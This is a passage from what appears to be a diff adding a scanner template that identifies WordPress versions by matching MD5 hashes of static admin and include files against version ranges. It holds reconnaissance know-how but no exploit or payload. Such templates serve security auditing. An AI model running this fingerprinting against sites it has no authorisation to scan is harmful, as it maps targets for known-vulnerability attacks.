3.2.1 + dsl: + - "(\"8dd6727e3c05b901c98c664b0387d684\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"61428dd239102f7c4e8cff821fed5a9f\" == md5(body))" + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - "(\"6f3b5dc08823e70c717422e13b3ce1c9\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"aef70efd73e08f832ffa1871e08fb3d4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/farbtastic-rtl.css" + matchers: + - type: dsl + name: 3.8 - 5.3.6 + dsl: + - "(\"118f1189ffbb71e014402121b5456bc2\" == md5(body))" + - type: dsl + name: 2.8 - 3.2.1 + dsl: + - "(\"117dc1e6ac587635c98975cfcdfb0444\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"c188b80c09449490eeea135cbdbaa4f7\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"c2370ae59e15c0b0299a7b89ee93fb17\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/l10n-rtl.css" + matchers: + - type: dsl + name: 4.6 - 5.3.6 + dsl: + - "(\"69b0527be5b3aa2c1644fe5fc1c34afa\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"f39bf70450b95eb669ac26bb12f6a7d2\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"cabc44df7d4f2fa084496d62a1c9db53\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"fcb0063a38cf8348351737634db3f947\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ed7b18351eecc9ba8b2b65e634696e40\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"53e5c8837adee91b40f85796824297c0\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"dc59fb5a6c510e3856c86d5d9df08328\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"17786dc78f167ce19373f8cac1a341bd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/iris.min.js" + matchers: + - type: dsl + name: 4.7 - 5.3.6 + dsl: + - "(\"45076064fdcbfcf9f5c8996e10ac4bc9\" == md5(body))" + - type: dsl + name: 4.1 - 4.6.20 + dsl: + - "(\"75c63560c640c4a6c31f5565dfb0e8a9\" == md5(body))" + - type: dsl + name: 3.8 - 4.0.32 + dsl: + - "(\"7407504e1137f61fd8a18ba18c82bc1b\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"d6537a873048d3725fb96cb99adc9b44\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"99948214c800f7f5cd08bdda7b31022e\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f03190302132dd7dd43dc3c26ef616a4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-icon-rtl.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"06fa2062900ec9b9561403625050c939\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fedcbcc78a6bb0af907fb6f96903510e\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"651951a752929e9254b3599b8496029a\" == md5(body))" + - type: dsl + name: 4.9 - 5.3.6 + dsl: + - "(\"843b8077b07dce1d6bd532aa7ad3e61b\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f8fc0b81fa9a174c90445282c90b2a99\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/csslint.js" + matchers: + - type: dsl + name: 4.9 - 5.3.6 + dsl: + - "(\"e1b73b2ee9f94bd0f0cace5f09fd8251\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ebbcc94d5fcfb149e508a6b3f2c06cbd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/compat3x/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"8f0e27297dd73de76b24a8ee11ee683d\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"0bcfa3158493fcc012b28cc71cf62c12\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"5210cc9135346dcc15c9258eae55868a\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"790e3c426331bcdfbb33c636090b6194\" == md5(body))" + - type: dsl + name: 4.0 - 4.2.29 + dsl: + - "(\"3db45ca97f2d1bccc5c7ec65abbf8b55\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"751eb6f050f947374572ea1870482819\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"2bdb6ec1c3d931d9ecbb169fcf6f5662\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8fdf94194f514bb1519bea82ef95753e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/license.txt" + matchers: + - type: dsl + name: 4.5.5 - 4.9.1 + dsl: + - "(\"0d0434c8b176c525a6fce9cefdf8e106\" == md5(body))" + - type: dsl + name: 4.5 - 4.7 + dsl: + - "(\"a2b365a131a3aaa578bcce14ae9a0512\" == md5(body))" + - type: dsl + name: 3.9.15 - 4.4.14 + dsl: + - "(\"2c55b47570a0802d3ec40781d2d6adc9\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.5 + dsl: + - "(\"e6fa1601644f9ad7f2a8ed5f9671d0d5\" == md5(body))" + - type: dsl + name: 3.9.4 - 4.4 + dsl: + - "(\"3938fcd57688b4d7681a50d6a1f53e71\" == md5(body))" + - type: dsl + name: 3.9 - 4.1 + dsl: + - "(\"ae123513dd2e70337dafc9f57ece23fd\" == md5(body))" + - type: dsl + name: 3.7.6 - 3.8.16 + dsl: + - "(\"9f752d0964de81f51a66c7408f6a4253\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.5 + dsl: + - "(\"38770f444df2e78c4431ef84cc94b477\" == md5(body))" + - type: dsl + name: 3.7.17 - 3.8.25 + dsl: + - "(\"732b8b10f9f4e8af61ab94c713580149\" == md5(body))" + - type: dsl + name: 3.4 - 3.5.2 + dsl: + - "(\"b7d6694302f24cbe13334dfa6510fd02\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"405836dc36b41ce662dba3423eab616c\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f8ad8fa91c45e9979d7cb58adb3686f4\" == md5(body))" + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - "(\"4d1f767863b6a3985f43e9401b0739f6\" == md5(body))" + - type: dsl + name: 1.2.1 - 2.6.5 + dsl: + - "(\"c36b8609197b74b10c3b2db0533c0e1e\" == md5(body))" + - type: dsl + name: 0.71-gold - 2.3.3 + dsl: + - "(\"00a58df11c81a717b7441ba853dbf85f\" == md5(body))" + - type: dsl + name: 4.5.14 - 5.0.2 + dsl: + - "(\"9348da52c104f75fe1befc73609020cf\" == md5(body))" + - type: dsl + name: 3.9.24 - 4.4.24 + dsl: + - "(\"f5847c886a3ea0cce59e06a502686989\" == md5(body))" + - type: dsl + name: 3.7.26 - 3.8.35 + dsl: + - "(\"0f5ad1c4e89f08d3553fbae4b1141009\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.3.6 + dsl: + - "(\"40fc2f39d472a1bb52f4ebe59702e0c2\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ad4c696c2b7a3971393d00c67bac0d05\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/quicktags.js" + matchers: + - type: dsl + name: 4.8 - 5.0.11 + dsl: + - "(\"bb36c516f8fd9ecc5d05b750f92cc1ae\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"481e904dd706f51af4bf2faa4070165b\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"213aa843be923e9b3cd4e8231551d01d\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"f623cad23a3ce005fcd054d9e5adcaad\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"3ea535778aa41165e0b6fdbe1fa7c4b4\" == md5(body))" + - type: dsl + name: 3.9 - 4.0 + dsl: + - "(\"75a2b7d66218b95cc439cd82daea731d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"7b69ef69e6e9a070b872a6f95ec9c457\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"2a040163533eceee9b05c95216bf6764\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"cb35ecf64895decdb22a0f1ae83e4e7c\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"77a0503d00ffbf740d3572411c676724\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"4f9b1ffdbbe292ae09a17bd5638c8152\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"522dd357ce0e14c054e91851be2c7326\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"954c48f2a654620e6c8c286d6016d224\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"b70c650cff9a2601ba9d9aebf1215a6e\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"30ef4fe9bbc2a3259b0a1179f8b3f5d8\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"05f72f5183487b3d93ffdea33f521cff\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"bee34afdddc81cd7fb4375bc1950a4c3\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"13fae754baf95c39371e539c4b627dde\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"f7f1cad5bc1ad060439835b57d263709\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"3a7dd5f21f0185d288509c11dad9adcc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpemoji/plugin.js" + matchers: + - type: dsl + name: 4.5 - 5.0.11 + dsl: + - "(\"f77a6131c150653ddfa17a568a1962d0\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"1d793200d7b3e0f80818903ca5721bc7\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"671c895cbc8044b1c6145fba999eea7a\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"5345ad90ee783d64afa87ec1b1ab654d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/accordion.js" + matchers: + - type: dsl + name: 4.3 - 5.0.11 + dsl: + - "(\"ef3fe33d4ce12fe5254e5af1025ce70a\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"f25e56e30af6382e3770be437493373a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"450d5207ff6942004d749e0ed59d8a16\" == md5(body))" + - type: dsl + name: 3.6 - 3.9.33 + dsl: + - "(\"481cc628a58bdbd7ac2e604321ae5fef\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"f2086c19efb64a0b66f05f46dd35ae9b\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"5d0833119cdd6d030e69e499b6ac26cc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/svg-painter.js" + matchers: + - type: dsl + name: 3.8 - 5.0.11 + dsl: + - "(\"87dcfbe97f902fa77cc4a9889c827afc\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"045eeffbb70b6f0cb98f444cd5b16c85\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"78b62a77d26a89151be971c140a1e382\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-header.js" + matchers: + - type: dsl + name: 3.8 - 5.0.11 + dsl: + - "(\"32b3005887a4cb606fecc09c756605bb\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"955638fc743b925bb6425ac2c7e19903\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"bfdfbcd9ca2a53e91e857effb3410f0f\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"d02c557f15f702c040547ba4ebe7c21e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/gallery.js" + matchers: + - type: dsl + name: 4.4 - 5.0.11 + dsl: + - "(\"78cfa96506bf3965c18afa6de5b5abb6\" == md5(body))" + - type: dsl + name: 3.8 - 4.3.25 + dsl: + - "(\"1be9174b160c7eb40e6cdce4031ae89e\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"c46e25f07876b469e084d9b0696ea235\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"60bf226af2fd347b5a9deabe699a7a57\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"c18e6c65857266d2f189dbbf98374e43\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"59160556d01955e4eb91af2227f8722e\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"89772dfb0b8cc96168923a057ba97131\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"ee56b3e15c6013a01692799350229b75\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"80af48faad6e78172a7a3f4b612afd64\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"63b104e2188b3c9504fc58e7773425ad\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"3f1cbb95c0a95ede44aa549021984e9e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media-upload.js" + matchers: + - type: dsl + name: 4.5 - 5.0.11 + dsl: + - "(\"94b464e9b4ec6b545486af795f24016d\" == md5(body))" + - type: dsl + name: 4.0 - 4.4.24 + dsl: + - "(\"5f66a88c118be462a566029db50aa3a2\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"da02ac15713968b6cff0bcafc4dfc0df\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"b2507d1ad5b4246899da37977f271477\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a3767f4e61a7fd4fc7733fa50cffcf8d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"8772e3e39912975229d15c246e828482\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"f119160af22c4dd7bd550b6392868678\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"a0f1e8bef23de300136e25af561cbe87\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"5cc83ad6cd63863e0dc5e20b810c9189\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"db178121dfb44e4208251c4723eb00c0\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"813637207d5f403cbc32feefb0ec32d7\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"7cbf5fe71bd15999b72f34671dfc4f6c\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"12e44ee24fd364725b547b797e72779c\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"5e579c9c6081deae17dffb254b4779aa\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"3fc8d4f8151f3ca1dc9804b947934218\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"983981007b91cd7973b474cbe0d3cf82\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-audio-widget.js" + matchers: + - type: dsl + name: 4.8 - 5.0.11 + dsl: + - "(\"9afcfed7095623b2c6a90ffb3ed2489f\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"1853c2371eabae2afccfb72a5523edbe\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"5020494ddd3b703801766eb3c75bf453\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/revisions.js" + matchers: + - type: dsl + name: 4.8 - 5.0.11 + dsl: + - "(\"8d1b4d8308f2fc136df5dd875ee5529f\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"4eb824b75d3e4d62bdc80a6d2a79a377\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"fd96dbd3b932f43a166651e4553cbf00\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"41f746a4087bec7e9b0db4152759d169\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"f6a37bc118b6b9c7b7b17617c1f969af\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d86d279a545eca8e5e2b325b15f0a8e1\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"a80d81c448b0381a5e22fc7e4e09521e\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"a005233637f6f2564e710a0e4a5b0e1f\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"c5f20aa2e318716cc3b6f539c9528dd5\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"06814cc3d64f65157ab2bfb16e555219\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/shortcode.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"fc8cb580e0edc5cda1a550747d0de6c9\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"735f904b0d3315c8e51aca680bbb8056\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"eb207a02d03e3196d9d14ad139327fb5\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"457c14222f3c264b68ebcbe988e0efbf\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"7d4f49af7fc0f2a7f07b594bb280dff2\" == md5(body))" + - type: dsl + name: 3.8 - 3.9 + dsl: + - "(\"de6d7cb739e90fc6d6c43272bd0c3598\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"667dfe93afdf63592ca07ec403b05170\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"6e3848c6ea0f681f669a0c8f942bf41b\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"e97bf5b755c0c98bc63ed715b7fb3ff9\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"0540a810bff1d0c5e2c9507df353ce8a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/wp-mediaelement.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"8a628f94d5775fdf423f7cae30eb9453\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"1d889c99f04a39573d4be5b346c6272f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3fc9c567b4fe652008ea1c14428c9363\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"9f38d89f0e227bebd5ba84ac75e10f5a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"95c1dc92db0652488b6b3f48c55e40d1\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"2ea532fa670298e162824a0142ae7b9a\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"f6d921a62cf96294281e0a202a017846\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"4e654df64f6c6971d29676c04eb5481a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"4e9e692fb1d6bf02e7032c52739a93e5\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"e781b3e173836b68d9c9d16e24fe66ac\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"03bd5bce1479cfa83e955c1392efb02e\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"7ff2281b44db7103a37cabdeca0880ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/utils.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"19ea0da213eda9c7bc4360f1d4c18b3c\" == md5(body))" + - type: dsl + name: 4.4 - 4.6.20 + dsl: + - "(\"b59e4faadb8e122faa031d99f1966ea4\" == md5(body))" + - type: dsl + name: 4.0 - 4.3.25 + dsl: + - "(\"01b7f89601bfa36ffee09f056f2cc38a\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"7ef14f85ee633c3aa2be8db18c23121a\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a5f4880c9cca30561e9290f0dafda128\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"0cb234c48b5a81baaaaa30f570199d9d\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"3328e64dc78c8f83b8a976dd416b1269\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"06048f8ea732a49aa4215b704e49e935\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-video-widget.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"1574427094b8df449b4c21384fa2729d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"133a39bd8c47630947212e04dc47672a\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"94f76a64411630ce10e215e74e518f47\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ccda3ae7dca5f3ce647c51f953f36eda\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-image-widget.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"086291b366af501ea4378aca5dc07032\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"8fac7176be3db30dfc5d0c59514ac1f2\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"082c8d564caa265aa7aaaad422a4acee\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"8ec83b6b93233f94e76351378fdf2865\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-gallery-widget.js" + matchers: + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"437aac35ea3d3a698505ce9aa7a4c090\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"90ec0828c40b94a8e5f3eea5ce423fec\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"7bfc632ffa82a98949d5c2f5ea3c0e9b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ie-rtl.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"12e3799f007d1876b12835d0e5ef2f52\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"0eaa7745837d3d443a69d044ed3d34ce\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e3b5f3b8fced413fbba5140998158eb2\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8a1eb2b5519ed4a89bd86735409925c3\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"931711f9b9b9e7c4182dbe7e382cf804\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"0b9e0977caa2f7f8f935d5b5536cf6d7\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"fd7d0df7b16e00fd528ccf616e4124d3\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e1b5a696678e23949a7b98d8510e0f55\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"9a4e00d098d584cfb57cb10eaaa71214\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"879bad5fb1d6485b6d9b773c53771c36\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"3284308c86ab8da25a1102d29cf30bdf\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"7ee33e4b7774cdf5d016e99acf01409a\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"09ba525a650f839144871fba3f38c8f2\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"40582bd18d990906e258b22f748a5a31\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"f47a2b680e86328c5ca128a561360675\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"1f4b5b58ca585ed3897535738260631f\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"a0d306ff28ee7a91c04dd2ba920d589a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"167ed35a0cf8b028cacc63b0894b6629\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"bf33651153ac82258acd4f56be924851\" == md5(body))" + - type: dsl + name: 2.5 - 2.6 + dsl: + - "(\"650555c0139e543813ef451d0e83873f\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"f6cb41f2339fb35c868329897706705d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e9c1bfd4053c8fc39dd8506be39cd1cf\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"55a791469c9bc1886f4272fd3c6ddf27\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b2eac5246949450f734078369c7a7d30\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/code-editor-rtl.css" + matchers: + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"b00c896ff0bcbcdd0c8d3f5331842e60\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8c7770ef099a7c001a3f8d103d95291d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"c1a750b14528327531f6920d680d409f\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"f2b0f0835b1c0011ee2f52a48af4abdf\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"33750485bdfeeabb2f63e40054422dc6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/hoverintent-js.min.js" + matchers: + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"492aa1f2633a89704f676a97e9a13a74\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"08207f7088b62e6096753736b01cc13f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js" + matchers: + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ffff6c533f2ca672619b343bdd5e1546\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-url.js" + matchers: + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f1983e64a04b50274943a4e733b5bd38\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-url.min.js" + matchers: + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"7274005802b2e364d7780806526095cf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js" + matchers: + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"bfba25ea79e5be8e3aef1ca60cac1e83\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/w-logo-blue-white-bg.png" + matchers: + - type: dsl + name: 5.4.2 - 5.6 + dsl: + - "(\"000bf649cc8f6bf27cfb04d1bcdcd3c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-pointer.min.js" + matchers: + - type: dsl + name: 3.7 - 5.2.9 + dsl: + - "(\"368f987c644d70580097e48066c99082\" == md5(body))" + - type: dsl + name: 3.5 - 